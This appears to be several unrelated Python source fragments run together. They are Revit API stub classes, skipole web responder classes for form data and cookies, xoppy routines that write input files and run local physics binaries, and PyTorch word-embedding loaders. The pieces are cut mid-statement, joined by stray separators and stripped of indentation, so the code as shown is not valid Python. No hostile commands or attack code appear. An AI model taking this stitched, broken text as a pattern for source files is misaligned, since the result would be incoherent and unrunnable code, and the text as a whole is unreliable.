class DocumentWorksharingEnabledEventArgs(RevitAPISingleEventArgs, IDisposable):
""" The event arguments used by the DocumentWorksharingEnabled event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def GetDocument(self):
"""
GetDocument(self: DocumentWorksharingEnabledEventArgs) -> Document
Returns document associated with this event
Returns: The document associated with this event.
"""
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class ElementTypeDuplicatedEventArgs(RevitAPIPostDocEventArgs, IDisposable):
""" The event arguments used by the ElementTypeDuplicated event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
NewElementTypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The id of the newly duplicated ElementType.
Get: NewElementTypeId(self: ElementTypeDuplicatedEventArgs) -> ElementId
"""
NewName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The name of the newly duplicated ElementType.
Get: NewName(self: ElementTypeDuplicatedEventArgs) -> str
"""
OriginalElementTypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The id of the element type that is duplicated.
Get: OriginalElementTypeId(self: ElementTypeDuplicatedEventArgs) -> ElementId
"""
class ElementTypeDuplicatingEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the ElementTypeDuplicating event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
ElementTypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""The id of the ElementType to be duplicated.
Get: ElementTypeId(self: ElementTypeDuplicatingEventArgs) -> ElementId
"""
class EventStatus(Enum, IComparable, IFormattable, IConvertible):
"""
Describes the status of an action which triggered a post event.
enum EventStatus, values: Cancelled (1), Failed (-1), Succeeded (0)
"""
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): # cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): # cannot find CLR method
pass
def __gt__(self, *args): # cannot find CLR method
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): # cannot find CLR method
pass
def __lt__(self, *args): # cannot find CLR method
pass
def __ne__(self, *args): # cannot find CLR method
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
def __str__(self, *args): # cannot find CLR method
pass
Cancelled = None
Failed = None
Succeeded = | |
<filename>skipole/ski/responders/submitters.py<gh_stars>0
"""A Respond object instance is placed in a Respond page,
The instance is callable, and the respondpage calls it
to provide the page action"""
import json, collections
from http import cookies
from string import Template
from .. import skiboot, tag
from ..excepts import ValidateError, ServerError, FailPage, ErrorMessage
from . import Respond
class SubmitData(Respond):
"""
This responder is used in conjunction with previous responders that validates and stores form data in call_data.
Given optional submit_list strings, they will be passed to the user provided submit_data function
in the submit_list argument.
If submit_data raises a FailPage then the fail_ident page will be called.
"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates a list of allowed caller idents is required
allowed_callers_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': True, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"""Calls submit_data"""
self._check_allowed_callers(caller_page, ident_list, proj_ident)
try:
self._submit_data(ident_list, skicall)
except FailPage as e:
# raises a PageError exception
self.raise_error_page(proj_ident, [e.errormessage], e.failpage)
# so all ok, get the target page
return self.get_target_page(proj_ident)
class ColourSubstitute(Respond):
"""
This responder only applies where the final page returned is a css page.
It will call your submit_data function which should return a dictionary of strings as keys
and colour strings as values. The keys will be searched for in the target page
with format '${keystring}' and where found the colour value will be placed there.
If submit_data raises a FailPage then the fail page will be called unchanged.
"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': False, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"""Calls submit_data"""
try:
colours = self._submit_data(ident_list, skicall)
except FailPage as e:
# return fail page unchanged, without an error
if e.failpage:
page = self.get_page_from_ident(e.failpage, proj_ident)
else:
page = self.get_fail_page(proj_ident)
if page is None:
raise ServerError("Invalid responder fail page")
return page
# so all ok, get the target page
if not colours:
return self.get_target_page(proj_ident)
if not isinstance(colours, dict):
raise ServerError("Invalid response, the ColourSubstitute responder requires submit_data to return a dictionary.")
skicall.page_data['colour_substitution'] = colours
return self.get_target_page(proj_ident)
class SetCookies(Respond):
"""Calls submit_data to get a http.cookies.BaseCookie object or alternatively a list of lists [[key, value, max-age],...]
with max-age as integer seconds. If the list form is used, cookies will be created with a path equal to the project path
and with the httponly and secure flags set"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates a list of allowed caller idents is required
allowed_callers_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': False, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"""Sets cookies, submit_data should return an instance of http.cookies.BaseCookie or a list of lists.
This sets the cookie returned into skicall.page_data['set_cookie']"""
self._check_allowed_callers(caller_page, ident_list, proj_ident)
try:
sendcookies = self._submit_data(ident_list, skicall)
except FailPage as e:
# raises a PageError exception
self.raise_error_page(proj_ident, [e.errormessage], e.failpage)
# sets the cookies in the page headers
if sendcookies:
if isinstance(sendcookies, cookies.BaseCookie):
skicall.page_data['set_cookie'] = sendcookies
elif isinstance(sendcookies, list) or isinstance(sendcookies, tuple):
# assume sendcookies is a list of the form [[key, value, max-age],...]
try:
cki = cookies.SimpleCookie()
# set project path
ck_path = skicall.projectpaths()[skicall.project]
# however this path ends with a /, remove the last /
if len(ck_path)>1 and ck_path.endswith('/'):
ck_path = ck_path.rstrip('/')
for ckitem in sendcookies:
ck_key, ck_string, max_age = ckitem
cki[ck_key] = ck_string
cki[ck_key]['max-age'] = int(max_age)
cki[ck_key]['path'] = ck_path
cki[ck_key]['secure'] = True
cki[ck_key]['httponly'] = True
except:
raise ServerError(message = "cookie list not valid, should be [[key, value, max-age],...] with max-age as integer seconds")
skicall.page_data['set_cookie'] = cki
else:
raise ServerError(message = "Returned cookies from submit_data not valid")
return self.get_target_page(proj_ident)
class GetDictionaryDefaults(Respond):
"""
Web browsers do not send empty fields, therefore a submitted dictionary may have items missing. This responder calls
your submit_data function which should return a dictionary with default values. Any missing fields
in the form data are then filled in with these defaults.
The call to submit data will have the 'widgfield':widgfield tuple in the submit dictionary
"""
# This indicates a target page ident is required
target_ident_required = True
# This indicates a list of allowed caller idents is required
allowed_callers_required = True
# The widgfield to test
widgfield_required = True
# This indicates an optional submit_list and fail_ident is required
submit_required = True
# Options for the fields argument
field_options = {'fields': False, # If False, no fields are expected
'widgfields':False, # If True, fields are widgfields, if False, can be other constants
'widgfield_values':False, # If True the field values are widgfields
'fields_optional': True, # if fields is True, then False here means fields must be supplied
'field_values':False, # if True, field values are used
'field_keys': False, # if field_values is True, and this field_keys is True, the values supplied are dictionary keys
'empty_values_allowed':True, # If True, '' is a valid value, if False, some data must be provided
'single_field': False} # Multiple fields accepted
def _respond(self, skicall, form_data, caller_page, ident_list, proj_ident, rawformdata):
"Gets the target page, filling in the form data"
if caller_page is None:
raise ValidateError()
self._check_allowed_callers(caller_page, ident_list, proj_ident)
# previous caller is allowed
skicall.submit_dict['widgfield']=self.widgfield.to_tuple_no_i()
try:
# and send the widgfield to submit_data
defaultdict = self._submit_data( ident_list, skicall)
except FailPage as e:
# raises a PageError exception
self.raise_error_page(proj_ident, [e.errormessage], e.failpage)
if not isinstance(defaultdict, dict):
raise ServerError(message = "Returned value from submit_data not valid")
# if widgfield empty
if (self.widgfield not in form_data) or (not form_data[self.widgfield]):
form_data[self.widgfield] = defaultdict
return self.get_target_page(proj_ident)
formdict = form_data[self.widgfield]
if not isinstance(formdict, dict):
raise ValidateError()
# check if an unexpected item has been submitted
for field, val in formdict.items():
if field not in defaultdict:
raise ValidateError()
# fill in any missing key values
for field, val in defaultdict.items():
if field not in formdict:
formdict[field] = val
# so all ok, get the target page
return self.get_target_page(proj_ident)
class FieldStoreSubmit(Respond):
"""Takes submitted data from the received form with the given field (regardless of widget name - only uses field name to choose | |
npts_per + 1) / float( n * npts_per) * (b2 - b1) + b1
berr = numpy.arange(n * npts_per + 1) * 0.0
bphase = 2.0 * numpy.pi / lambdau * z
btot = bmod * numpy.sin(bphase)
f = open("bfield.dat", 'w')
f.write('# Columns: z(cm), ampl(tesla), phserr, total(tesla)\n')
f.write('# total = ampl * sin ( twopi/period*z + phserr ) \n')
f.write('# period= %g; nper= %d; npts=%d \n' % (lambdau, n, npts_per))
for i in range(z.size):
f.write("%g %g %g %g\n" % (z[i], bmod[i], berr[i], btot[i]))
f.close()
print("File written to disk: bfield.dat")
f = open("bfield2.dat", 'w')
for i in range(z.size):
if i != 0: f.write("\n")
f.write("%g %g %g" % (z[i], bmod[i], bphase[i]))
f.close()
print("File written to disk: bfield.dat")
with open("txt2u.inp", "w") as f:
f.write("bfield2.dat\n")
f.write("%s\n" % BFILE)
f.write("%g\n" % (PERIOD_BFIELD))
f.write("%d\n" % (NPER_BFIELD))
f.write("%d\n" % (NPTS_BFIELD))
run_external_binary("txt2u", " < txt2u.inp", "File written to disk should be: %s " % BFILE )
input = "\n"
input += ";Magnet parameters\n"
input += "PERIOD=%g NPER=%d NPTS=%d\n" % (PERIOD, NPER, NPTS)
input += "\n"
input += ";Photon energy\n"
input += "EMIN=%g EMAX=%g NE=%d\n" % (EMIN, EMAX, NENERGY)
input += "\n"
input += ";Storage ring\n"
input += "ENERGY=%g CURRENT=%g\n" % (ENERGY, CUR)
input += " SIGX=%g SIGY=%g\n" % (SIGX, SIGY)
input += "SIGX1=%g SIGY1=%g\n" % (SIGX1, SIGY1)
input += "\n"
input += ";Pinhole (mm or mrad)\n"
input += "DISTANCE=%g\n" % D
input += "XPC=%g XPS=%g NXP=%d\n" % (XPC, XPS, NXP)
input += "YPC=%g YPS=%g NYP=%d\n" % (YPC, YPS, NYP)
input += "\n"
input += ";Calculation parameter\n"
input += "MODE=%d NSIG=%d TRAJECTORY=new+keep\n" % (MODE, NSIG)
input += "XSYM=yes HANNING=%d\n" % HANNING
input += "\n"
input += ";Filenames\n"
input += 'BFILE="undul.bf"\n'
input += 'TFILE="undul.traj"\n'
input += "\n"
input += "END\n"
with open("yaup.inp", "wt") as f:
f.write(input)
run_external_binary(binary="yaup", post_command="", info="Output file should be XXX")
with open("u2txt_traj.inp", "wt") as f:
f.write("2\n")
f.write("%s\n" % (TFILE))
f.write("undul_traj.dat\n")
run_external_binary(binary="u2txt", post_command="< u2txt_traj.inp", info="Output file should be undul_traj.dat")
#
# add spectral power and cumulated power
#
results = numpy.loadtxt("yaup-0.out", skiprows=33)
e = results[:,0]
f = results[:,1]
power_in_spectrum = f.sum() * 1e3 * codata.e * (e[1] - e[0])
print("\nPower from integral of spectrum: %8.3f W" % (power_in_spectrum))
codata_mee = codata.m_e * codata.c ** 2 / codata.e # electron mass in eV
gamma = ENERGY * 1e9 / codata_mee
ptot = (NPER / 6) * codata.value('characteristic impedance of vacuum') * \
CUR * codata.e * 2 * numpy.pi * codata.c * gamma ** 2 * (K ** 2 ) / (PERIOD * 1e-2)
print("\nTotal power radiated by the undulator with fully opened slits [W]: %g \n" % (ptot))
print("\nRatio Power from integral of spectrum over Total emitted power: %5.4f" % (power_in_spectrum / ptot))
spectral_power = f * codata.e * 1e3
try:
cumulated_power = spectral_power.cumsum() * numpy.abs(e[0] - e[1])
except:
cumulated_power = 0.0
run_external_binary(binary="u2txt", post_command="< u2txt_traj.inp",
info="Output file should be undul_traj.dat")
return e,f,spectral_power,cumulated_power
#
# X-ray tubes
#
# --------------------------------------------------------------------------------------------
# --------------------------------------------------------------------------------------------
def xoppy_calc_xtube_w(VOLTAGE=100.0,RIPPLE=0.0,AL_FILTER=0.0):
print("Inside xoppy_calc_xtube_w. ")
for file in ["tasmip_tmp.dat"]:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
try:
with open("xoppy.inp","wt") as f:
f.write("%f\n%f\n%f\n"%(VOLTAGE,RIPPLE,AL_FILTER))
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'tasmip.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), 'tasmip') + "' < xoppy.inp"
print("Running command '%s' in directory: %s \n"%(command,locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
print("\nOutput file: %s/tasmip_tmp.dat\n" % (locations.home_bin_run()))
return "tasmip_tmp.dat"
except Exception as e:
raise e
def xoppy_calc_xtubes(ITUBE=0,VOLTAGE=30.0):
print("Inside xoppy_calc_xtubes. ")
for file in ["xtubes_tmp.dat"]:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
try:
with open("xoppy.inp","wt") as f:
f.write("%d\n%f\n"%(ITUBE+1,VOLTAGE))
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'xtubes.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), "xtubes") + "' < xoppy.inp"
print("Running command '%s' in directory: %s "%(command, locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
print("\nOutput file: %s/xtubes_tmp.dat\n" % (locations.home_bin_run()))
return os.path.join(locations.home_bin_run(), "xtubes_tmp.dat")
except Exception as e:
raise e
#
# inpro
#
def xoppy_calc_inpro(CRYSTAL_MATERIAL=0,MODE=0,ENERGY=8000.0,MILLER_INDEX_H=1,MILLER_INDEX_K=1,MILLER_INDEX_L=1,\
ASYMMETRY_ANGLE=0.0,THICKNESS=500.0,TEMPERATURE=300.0,NPOINTS=100,SCALE=0,XFROM=-50.0,XTO=50.0):
print("Inside xoppy_calc_xinpro. ")
try:
with open("xoppy.inp", "wt") as f:
f.write("%s\n"% (os.path.join(locations.home_data(), "inpro" + os.sep)))
if MODE == 0:
f.write("+1\n")
elif MODE == 1:
f.write("-1\n")
elif MODE == 2:
f.write("+2\n")
elif MODE == 3:
f.write("-1\n")
else:
f.write("ERROR!!\n")
f.write("%f\n%d\n"%(THICKNESS,CRYSTAL_MATERIAL+1))
f.write("%s\n%f\n"%("EV",ENERGY))
f.write("%d\n%d\n%d\n"%(MILLER_INDEX_H,MILLER_INDEX_K,MILLER_INDEX_L))
f.write("%f\n%f\n%s\n"%(ASYMMETRY_ANGLE,TEMPERATURE, "inpro.dat"))
if SCALE == 0:
f.write("1\n")
else:
f.write("%d\n%f\n%f\n"%(2,XFROM,XTO))
f.write("%d\n"%(NPOINTS))
for file in ["inpro.par","inpro.dat","inpro.spec"]:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'inpro.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), 'inpro') + "' < xoppy.inp"
print("Running command '%s' in directory: %s "%(command, locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
#add SPEC header
txt = open("inpro.dat").read()
outFile = "inpro.spec"
f = open(outFile,"w")
f.write("#F inpro.spec\n")
f.write("\n")
f.write("#S 1 inpro results\n")
f.write("#N 3\n")
f.write("#L Theta-TetaB s-polarized reflectivity p-polarized reflectivity\n")
f.write(txt)
f.close()
print("File written to disk: inpro.dat, inpro.par, inpro.spec")
#show calculated parameters in standard output
txt_info = open("inpro.par").read()
for line in txt_info:
print(line,end="")
return outFile
except Exception as e:
raise e
#
# xcom
#
def xoppy_calc_xcom(NAME="<NAME>",SUBSTANCE=3,DESCRIPTION="SiO2:B2O3:Na2O:Al2O3:K2O",\
FRACTION="0.807:0.129:0.038:0.022:0.004",GRID=1,GRIDINPUT=0,\
GRIDDATA="0.0804:0.2790:0.6616:1.3685:2.7541",ELEMENTOUTPUT=0):
print("Inside xoppy_calc_xxcom. ")
try:
with open("xoppy.inp","wt") as f:
f.write(os.path.join(locations.home_data(), 'xcom')+ os.sep + "\n" )
f.write( NAME+"\n" )
f.write("%d\n"%(1+SUBSTANCE))
if (1+SUBSTANCE) != 4:
f.write( DESCRIPTION+"\n")
if (1+SUBSTANCE) <= 2:
f.write("%d\n"%(1+ELEMENTOUTPUT))
else:
nn = DESCRIPTION.split(":")
mm = FRACTION.split(":")
f.write("%d\n"%( len(nn)))
for i in range(len(nn)):
f.write(nn[i]+"\n")
f.write(mm[i]+"\n")
f.write("1\n")
f.write("%d\n"%(1+GRID))
if (1+GRID) != 1:
f.write("%d\n"%(1+GRIDINPUT))
if (1+GRIDINPUT) == 1:
nn = GRIDDATA.split(":")
f.write("%d\n"%( len(nn)))
for i in nn:
f.write(i+"\n")
if (1+GRID) != 1:
f.write("N\n")
f.write("%s\n" % GRIDDATA)
f.write("1\n")
f.close()
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'xcom.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(),'xcom') + "' < xoppy.inp"
print("Running command '%s' in directory: %s "%(command,locations.home_bin_run()))
print("\n--------------------------------------------------------\n")
os.system(command)
print("\n--------------------------------------------------------\n")
# write spec file
if (1+SUBSTANCE) <= 2:
if (1+ELEMENTOUTPUT) == 1:
titles = "Photon Energy [Mev] Coherent scat [b/atom] " \
"Incoherent scat [b/atom] Photoel abs [b/atom] " \
"Pair prod in nucl field [b/atom] Pair prod in elec field [b/atom] " \
"Tot atten with coh scat [b/atom] Tot atten w/o coh scat [b/atom]"
elif (1+ELEMENTOUTPUT) == 2:
titles = "Photon Energy [Mev] Coherent scat [b/atom] " \
"Incoherent scat [b/atom] Photoel abs [b/atom] " \
"Pair prod in nucl field [b/atom] Pair prod in elec field [b/atom] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
elif (1+ELEMENTOUTPUT) == 3:
titles = "Photon Energy [Mev] Coherent scat [cm2/g] " \
"Incoherent scat [cm2/g] Photoel abs [cm2/g] " \
"Pair prod in nucl field [cm2/g] Pair prod in elec field [cm2/g] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
else:
titles = "Photon Energy [Mev] Coherent scat [cm2/g] " \
"Incoherent scat [cm2/g] Photoel abs [cm2/g] " \
"Pair prod in nucl field [cm2/g] Pair prod in elec field [cm2/g] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
else:
titles = "Photon Energy [Mev] Coherent scat [cm2/g] " \
"Incoherent scat [cm2/g] Photoel abs [cm2/g] " \
"Pair prod in nucl field [cm2/g] Pair prod in elec field [cm2/g] " \
"Tot atten with coh scat [cm2/g] Tot atten w/o coh scat [cm2/g]"
txt = open("xcom.out").readlines()
# copy to standard output
for line in txt:
print(line,end="")
outFile = "xcom.spec"
f = open(outFile, "w")
f.write("#F xcom.spec\n")
f.write("\n")
f.write("#S 1 xcom results\n")
f.write("#N 8\n")
f.write("#L "+titles+"\n")
for i in txt:
tmp = i.strip(" ")
if tmp[0].isdigit():
f.write(tmp)
else:
f.write("#UD "+tmp)
f.close()
print("File written to disk: xcom.spec")
return outFile
except Exception as e:
raise e
#
# powder_fml
#
def xoppy_calc_powder_fml(
FILE = os.path.join(locations.home_data(), "cif" + os.sep + "icsd_31142_sepiolite_BraunerPreisinger.cif"),
TITLE = "powder pattern using crysFML",
LAMBDA = 1.54056,
JOB = 0,
U = 0.0002,
V = -0.0002,
W = 0.012,
X = 0.0019,
LS = 1900.0,
THMIN = 1.0,
STEP = 0.05,
THMAX = 135.0,
):
files = ["xpowder_fml.par","xpowder_fml.ref","xpowder_fml.out"]
for file in files:
try:
os.remove(os.path.join(locations.home_bin_run(),file))
except:
pass
with open("xoppy.inp", "wt") as f:
f.write("%s\n" % (FILE))
f.write("%s\n" % (TITLE))
f.write("%g\n" % (LAMBDA))
f.write("%s\n" % (JOB))
f.write("%g\n" % (U))
f.write("%g\n" % (V))
f.write("%g\n" % (W))
f.write("%g\n" % (X))
f.write("%g\n" % (LS))
f.write("%g\n" % (THMIN))
f.write("%g\n" % (STEP))
f.write("%s\n" % (THMAX))
if platform.system() == "Windows":
command = "\"" + os.path.join(locations.home_bin(),'xpowder_fml.exe\" < xoppy.inp')
else:
command = "'" + os.path.join(locations.home_bin(), 'xpowder_fml') + "' < xoppy.inp"
print("Running | |
import torch
from torch.utils.data.dataset import TensorDataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import embrelassess.vecops as vecops
import pandas as pd
import numpy as np
import logging
import os
import io
import array
import six
def simple_syns(val):
"""normalises an input syncon name by stripping the language
Use this method when loading Vecsigrafo embeddings to avoid having
to specify the language every time, simply refer to syncons by
using the '#' prefix.
"""
return str(val).replace('en#', '#').strip()
class SwivelAsTorchTextVector(object):
"""torchtext.Vectors compatible object for Swivel embeddings
"""
def __init__(self, vecs_bin_path, vecs_vocab_path,
vecs_dims=300,
unk_init=torch.FloatTensor.zero_,
vocab_map=lambda x: x):
"""Creates a SwivelAsTorchTextVector from bin and vocab files
Args:
vecs_bin_path a .bin file produced by Swivel
vecs_vocab_path a vocab.txt file produced by Swivel
this should be aligned to the vectors in the bin file
unk_init tensor initializer for words out of vocab
vocab_map maps original tokens to new tokens at loading
time. This can be useful to simplify token names or to
avoid clashes when loading multiple embedding spaces.
"""
self.vocab, self.vecs = vecops.read_swivel_vecs(
vecs_bin_path, vecs_vocab_path, vecs_dims)
self.stoi = dict([(vocab_map(s), i) for i, s in
enumerate(self.vocab)])
self.dim = vecs_dims
self.vectors = torch.FloatTensor(self.vecs)
self.unk_init = unk_init
def __getitem__(self, token):
if token in self.stoi:
return self.vectors[self.stoi[token]]
else:
return self.unk_init(torch.FloatTensor(1, self.dim))
class TSVVectors(object):
def __init__(self, name,
sep='\t',
unk_init=torch.Tensor.zero_):
"""Arguments:
name: name of the file that contains the vectors
sep: field separator. By default the tab character
unk_init (callback): by default, initalize out-of-vocabulary word vectors
to zero vectors; can be any function that takes in a Tensor and
returns a Tensor of the same size
"""
self.unk_init = unk_init
self.logger = logging.getLogger(__name__)
self.load(name, sep=sep)
def __getitem__(self, token):
if token in self.stoi:
return self.vectors[self.stoi[token]]
else:
return self.unk_init(torch.Tensor(1, self.dim))
def load(self, name, sep='\t'):
path = os.path.join(name)
# path_pt = path + '.pt'
if not os.path.isfile(path):
raise RuntimeError('no vectors found at {}'.format(path))
# str call is necessary for Python 2/3 compatibility, since
# argument must be Python 2 str (Python 3 bytes) or
# Python 3 str (Python 2 unicode)
itos, vectors, dim = [], array.array(str('d')), None
# Try to read the whole file with utf-8 encoding.
binary_lines = False
try:
with io.open(path, encoding="utf8") as f:
lines = [line for line in f]
# If there are malformed lines, read in binary mode
# and manually decode each word from utf-8
except:
self.logger.warning("Could not read {} as UTF8 file, "
"reading file as bytes and skipping "
"words with malformed UTF8.".format(path))
with open(path, 'rb') as f:
lines = [line for line in f]
binary_lines = True
self.logger.info("Loading vectors from {}".format(path))
for line in lines:
# Explicitly splitting on "\t" is important, so we don't
# get rid of Unicode non-breaking spaces in the vectors.
entries = line.rstrip().split(sep)
word, entries = entries[0], entries[1:]
if dim is None and len(entries) > 1:
dim = len(entries)
elif len(entries) == 1:
self.logger.warning("Skipping token {} with 1-dimensional "
"vector {}; likely a header".format(word, entries))
continue
elif dim != len(entries):
raise RuntimeError(
"Vector for token {} has {} dimensions, but previously "
"read vectors have {} dimensions. All vectors must have "
"the same number of dimensions.".format(word, len(entries), dim))
if binary_lines:
try:
if isinstance(word, six.binary_type):
word = word.decode('utf-8')
except:
self.logger.info("Skipping non-UTF8 token {}".format(repr(word)))
continue
vectors.extend(float(x) for x in entries)
itos.append(word)
self.itos = itos
self.stoi = {word: i for i, word in enumerate(itos)}
self.vectors = torch.Tensor(vectors).view(-1, dim)
self.dim = dim
class RandomVectors(object):
"""torchtext.Vecrtors compatible object with random vectors for a given vocabulary
"""
def __init__(self, vocab_path,
unk_init=torch.Tensor.uniform_,
dim=None):
"""Arguments:
vocab_path: path of the vocab file, this may be a file with a token per
line, or a TSV where the first column contains the token names.
unk_init (callback): by default, initalize word vectors
to random uniform vectors between 0 and 1; can be any function that
takes in a Tensor and returns a Tensor of the same size
"""
self.logger = logging.getLogger(__name__)
self.unk_init = unk_init
assert(dim) # a dimension must be defined
self.load(vocab_path, dim)
def __getitem__(self, token):
if token in self.stoi:
return self.vectors[self.stoi[token]]
else:
return self.unk_init(torch.Tensor(1, self.dim))
def load(self, vocab_path, dim=None):
path = os.path.join(vocab_path)
# path_pt = path + '.pt'
if not os.path.isfile(path):
raise RuntimeError('no vectors found at {}'.format(path))
# str call is necessary for Python 2/3 compatibility, since
# argument must be Python 2 str (Python 3 bytes) or
# Python 3 str (Python 2 unicode)
itos, vectors = [], array.array(str('d'))
# Try to read the whole file with utf-8 encoding.
with io.open(path, encoding="utf8") as f:
lines = [line for line in f]
self.logger.info("Loading vectors from {}".format(path))
for line in lines:
# Explicitly splitting on "\t" is important, so we don't
# get rid of Unicode non-breaking spaces in the vectors.
entries = line.rstrip().split("\t")
word = entries[0]
tens = torch.Tensor(dim).uniform_(to=2) - 1.0
entries = tens.tolist()
vectors.extend(float(x) for x in entries)
itos.append(word)
self.itos = itos
self.stoi = {word: i for i, word in enumerate(itos)}
self.vectors = torch.Tensor(vectors).view(-1, dim)
self.dim = dim
class VecPairLoader():
"""Generates DataLoaders from a word embedding space and a relation file
On one hand we have word embeddings which need to be loaded. On the other
hand we have TSV word relation files, which provide pairs of words which
belong to some category (as well as negative pairs). For training PyTorch
models, we need to map the words to their embeddings to generate
TensorDatasets, which in practice are used during training as DataLoaders.
This class provides methods for performing these operations.
The embeddings are given by a PyTorch.text Vectors instance.
"""
def __init__(self, torch_vecs):
"""Creates a VecPairLoader based on a torchtext.vocab.Vectors
Args:
torch_vecs a torchtext.vocab.Vectors instance (or compatible)
"""
assert(torch_vecs)
self.vecs = torch_vecs
def vecOrEmpty(self, word):
"""Returns the vector for the word if in vocab, or a zero vector
Returns:
vector of the word if in vocab, or zero vector
found int 0 if not found, or 1 if found
"""
res = self.vecs[word]
if not (res.shape[0] == self.vecs.dim):
return torch.zeros(self.vecs.dim), 0
else:
return res, 1
def avg_vec(self, compound_word):
"""Returns a vector for a possibly compound_word
If the compound_word is in the vocab, simply returns that vector.
Otherwise, splits the compound word and returns the average of
the individual words.
Returns:
vector for the compound_word
tok_count number of subtokens derived from compound_word
toks_found how many of the subtokens were in the vocabulary
"""
compound_word = str(compound_word)
vec = self.vecs[compound_word]
